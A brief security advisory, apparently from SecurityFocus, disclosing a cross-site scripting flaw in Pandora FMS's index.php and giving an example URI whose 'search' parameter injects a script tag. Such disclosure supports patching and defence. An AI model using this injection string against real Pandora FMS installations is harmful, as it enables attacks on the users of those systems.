Pandora FMS 'index.php' Cross Site Scripting Vulnerability

An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus